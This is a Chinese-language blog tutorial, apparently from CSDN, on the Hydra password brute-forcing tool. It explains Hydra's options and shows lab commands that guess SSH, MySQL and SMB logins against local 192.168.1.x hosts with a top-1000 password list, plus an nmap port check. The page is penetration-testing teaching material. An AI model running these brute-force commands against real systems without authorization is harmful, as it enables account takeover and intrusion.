穷举篇(五)之Hydra端口服务穷举

最新推荐文章于 2024-06-29 22:00:00 发布
最新推荐文章于 2024-06-29 22:00:00 发布
阅读量562 收藏 2
点赞数
分类专栏: OWASP TOP10 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51730169/article/details/125036307
版权
本文介绍了Hydra工具的使用方法,包括基本参数解释和针对SSH、MySQL、SMB服务的穷举攻击实例。Hydra是一个端口扫描和密码破解工具,支持多种服务协议,如telnet、ftp、smtp等。通过指定目标IP、服务类型、用户字典和密码字典,可以进行多线程并发攻击,快速寻找有效的用户名和密码组合。
摘要由CSDN通过智能技术生成

一、hydra 密码穷举工具的使用

1、简介

hydra 是一个端口穷举服务的工具。
adam6500 asterisk cisco cisco-enable cvs firebird ftp[s] http[s]-{head|get|post}
http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s]
ldap3[-{cram|digest}md5][s] memcached mongodb mssql mysql nntp oracle-listener
oracle-sid pcanywhere pcnfs pop3[s] postgres radmin2 rdp redis rexec rlogin rpcap
rsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak
telnet[s] vmauthd vnc xmpp

2、参数说明

常用参数说明
hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns]
[-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV]
server service [OPT]
-R
继续从上一次进度接着破解
-S
大写,采用 SSL 链接
-s <PORT>
小写,可通过这个参数指定非默认端口
-l <LOGIN>
指定破解的用户,对特定用户破解。
-L <FILE>
指定用户名字典
-p <PASS>
小写,指定密码破解,少用,一般是采用密码字典。
-P <FILE>
大写,指定密码字典。
-e <ns>
可选选项,n:空密码试探,s:使用指定用户和密码试探
-C <FILE>
使用冒号分割格式,例如“登录名:密码”来代替-L/-P 参数
-M <FILE>
指定目标列表文件一行一条。
-o <FILE>
指定结果输出文件。
-f
在使用-M 参数以后,找到第一对登录名或者密码的时候中止破解。
-t <TASKS>
同时运行的线程数,默认为 16
-w <TIME>
设置最大超时的时间,单位秒,默认是 30s
-v / -V
显示详细过程
server
目标 ip
service
指定服务名,支持的服务和协议:telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt
http[s]-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3
mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn
icq sapr3 ssh2 smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd firebird ncp afp
等等
OPT
可选项

二、hydra 穷举 ssh 服务

1、实验演示

┌──(steven㉿kali)-[~]
└─$ hydra -l root -P /home/steven/penetra_test/top1000.txt -e ns -vV -f 192.168.1.46 ssh -t 1

在这里插入图片描述

三、hydra 穷举 mysql 服务

1、实验演示

hydra ip mysql -l 用户名 -P 密码字典 -t 线程(默认 16) -vV
hydra ip mysql -l 用户名 -P 密码字典 -e ns -vV
hydra ip mysql -l 用户名 -P 密码字典 -e ns -vV -s 端口

hydra -l root -P /home/steven/penetra_test/top1000.txt -e ns -vV -f 192.168.1.43 mysql -o /home/steven/penetra_test/mysql.txt

在这里插入图片描述

四、hydra 穷举 smb 服务

1、实验演示

PS C:\Users\Administrator> net share

共享名       资源                            注解

-------------------------------------------------------------------------------
C$           C:\                             默认共享
IPC$                                         远程 IPC
ADMIN$       C:\Windows                      远程管理
命令成功完成。

┌──(steven㉿kali)-[~/penetra_test]
└─$ nmap -p 445 192.168.1.43
Starting Nmap 7.91 ( https://nmap.org ) at 2022-05-30 23:41 CST
Nmap scan report for 192.168.1.43
Host is up (0.0016s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Nmap done: 1 IP address (1 host up) scanned in 0.13 seconds

┌──(steven㉿kali)-[~/penetra_test]
└─$ hydra -l administrator -P top1000.txt -e ns -vV -f 192.168.1.43 smb -o smb.txt

在这里插入图片描述在这里插入图片描述

Aτθ
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
38.网络安全渗透测试—[穷举1]—[穷举爆破神器九头蛇hydra详细讲解和利用]
qwsn
08-06 2624
一、常见的端口服务 二、九头蛇hydra的安装 1、九头蛇hydra:`穷举爆破神器` 2、九头蛇hydra:`kali自带的工具` 三、常见的端口服务穷举 1、ssh服务的爆破: 2、ftp服务的爆破: 3、rdp服务的爆破:hydra不可以爆破 4、mssql服务的爆破 5、mysql服务的爆破:mysql需要开启允许远程连接且最大错误连接次数需要很大 6、oracle服务的爆破 7、redis服务的爆破 8、postgresql服务的爆破弱口令检测 9、指定多个ip进行穷举
WEB安全之:密码穷举破解
f_carey的博客
05-26 2859
郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。 密码破解1 Hydra1.1 支持的协议1.2 攻击步骤1.3 攻击实例1.4 在线密码破解(了解)2 Metasploit 穷举模块使用3 邮箱破解4 指定后台密码破解4.1 常见 CMS 密码破解4.1.1 CMSmap4.2 一句话密码破解(PHP, JSP, ASP)4.2.1 cheetah4.3 多.
hydra常见端口服务穷举
记录学习,一起进步
02-19 1598
hydra常见端口服务穷举
hydra ssh
ban47491的博客
03-19 664
例子: hydra -l root -P '/root/4wei.txt' -t 6 -V ssh://192.168.240.3 备注: -t 线程 -l(小写)表示单个用户,-P(大写)表示多个密码,所以小写表示单个,大写就表示多个 -s 并非每个SSH服务器都在端口22上运行。聪明的管理员一直在更改它们。如果它是您的服务器,您将知道您需要指定端口。如果您已被雇...
应用协议安全Hydra 端口爆破工具.(九头蛇)
Karka_的博客
06-29 1019
这里我整合并且整理成了一份【282G】的网络安全从零基础入门到进阶资料包,需要的小伙伴可以扫描下方CSDN官方合作二维码免费领取哦,无偿分享!(2)实战:爆破 远程桌面 RDP.( 3389 端口 )(10)实战:爆破 PgSQL数据库( 5432 端口 )(6)实战:爆破 MSSQL数据库( 1433 端口 )(7)实战:爆破 MySQL数据库( 3306 端口 )(9)实战:爆破 Redis数据库( 6379 端口 )(1)实战:爆破 SSH 协议.( 22 端口 )④50份安全攻防面试指南。
学“狂飙”的网络安全,做最强盛的打工人!!
Karka_的博客
03-18 215
*刚刚结课,就有学员找到了14K的薪资。**课程虽已结束,但我们的结业帮扶持续进行。束,但我们的结业帮扶持续进行。
Hydra破解SSH端口
weixin_34128501的博客
05-19 1902
使用Kali 中 暴力破解软件Hydra破解Xshell登录密码 搭建环境 做这个实验呢是在虚拟机里做的,我们要满足一下条件才能确保实验的成功 准备Kali 准备Centos7 准备Xshell(远程登录软件) 所有pc机的ip地址在同一网段,互相能够ping通 实验目的 在物理机上使用Xshell 远程访问虚拟机上的linux,在不知道密码的前提下 实验开始 首先我们在物理机上打开Xshel...
snmp口令穷举是什么意思
最新发布
07-30
2. 使用`hydra`工具进行穷举: ```shell hydra -L 用户字典文件地址 -P 密码字典文件地址 -e ns -vV -t 1 目标机IP ``` `-L` 参数指定包含潜在用户名的文本文件, `-P` 指定包含潜在密码的文本文件, `-e ns` ...
Hydra暴力破解smb协议(Windows用户名和密码)
村口王大爷的博客
05-26 8682
首先什么是hydra Hydra对应的英文意思是九头蛇,它是一款爆破神器,可以对多种服务的账号和密码进行爆破,包括Web登录、数据库、SSH、FTP等服务,支持Linux、Windows、Mac平台安装,其中Kali Linux中自带Hydra。 暴力破解攻击:暴力破解攻击是指攻击者通过系统的组合所有可能性(例如登录时用的账户名.密码),说白了就是穷举法,尝试所有的可能性破解用户的账户名.密码等敏感信息,攻击者会经常使用自动化脚本组合出正确的用户名和密码。 SMB:全称是Server Message Bl
服务器用户名和密码思路和过程如下:
Susan_web的博客
01-06 597
关于拿服务器的用户名和密码的思路
记录一次 hydra爆破虚拟机win10 3389端口_hydra 3389 端口修改
m0_61331573的博客
04-07 543
Flutter、IOS开发、PHP开发、.NET、安卓逆向、云计算**2.打开kali系统然后打开xhydra图形化 hydra。这里设置目标的IP地址,爆破端口,还有协议并设置输出显示。3.然后设置你需要爆破的用户名和需要爆破的密码或者字典。1.首先打开win10关闭防火墙和杀毒软件。因为杀毒软件和防火墙会拦截恶意的爆破手段。
ssh更改端口后如何用hydra破解密码【nethunter】
wjwqp的专栏
02-18 1万+
用户为root,密码sdcard卡下passdic.txt,没有改端口直接用ssh协议,线程推荐为T=4,这里选择6 hydra -l root -P /sdcard/passdic.txt -v -e ns -t 6192.168.0.1 ssh 变更端口后,用-s 指定端口:2222 hydra -l root -P /sdcard/passdic.txt -v -e ns -t 8 -s 2222 ssh://192.168.0.30 Mysql hydra使用参考如下 ...
Hydra密码爆破工具使用教程图文教程(超详细)
热门推荐
wangyuxiang946的博客
12-06 2万+
Hydra也叫九头蛇,是一款开源的暴力PJ工具,集成在kali当中。
hydra使用教程
weixin_45778886的博客
03-14 4088
目录标题注意hydra详细使用教程hydra简介hydra常用命令hydra支持破解的服务/协议对应功能的参数模板1、破解ssh:2、破解ftp:3、get方式提交,破解web登录:4、post方式提交,破解web登录:5、破解https:6、破解teamspeak:7、破解cisco:8、破解smb:9、破解pop3:10、破解rdp:11、破解http-proxy:12、破解imap:实例演示-破解SSH密码1.使用字典对目标服务进行破解。2.当目标服务开放的端口不是默认端口时,使用 -s 进行指定。3
Hydra的基本使用
qq_46429177的博客
11-18 1416
-R 根据上一次进度继续破解 -S 使用SSL协议连接 -s 指定端口 -l 指定用户名 -L 指定用户名字典(文件) -p 指定密码破解 -P 指定密码字典(文件) -e 空密码探测和指定用户密码探测(ns) -C 用户名可以用:分割(username:password)可以代替-l username -p password -o 输出文件 -t 指定多线程数量,默认为16个线程 -vV 显示详细过程 使用案例: 使用hydra破解ssh的密码 hydra -L users.txt -P password
Hydra常见服务爆破
a1b2c3是弱口令
08-23 4189
SSH服务 hydra -l 用户名 -P 字典 -t 线程 -vV -e ns ip ssh FTP服务 (1)破解指定用户 hydra ip ftp -l 用户名 -P 字典 -t(线程默认16) -vv hydra ip ftp -l 用户名 -P 字典 -e ns(n表示空密码,s表示制定用户和密码试探-vv (2)批量破解 hydra ip ftp -...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值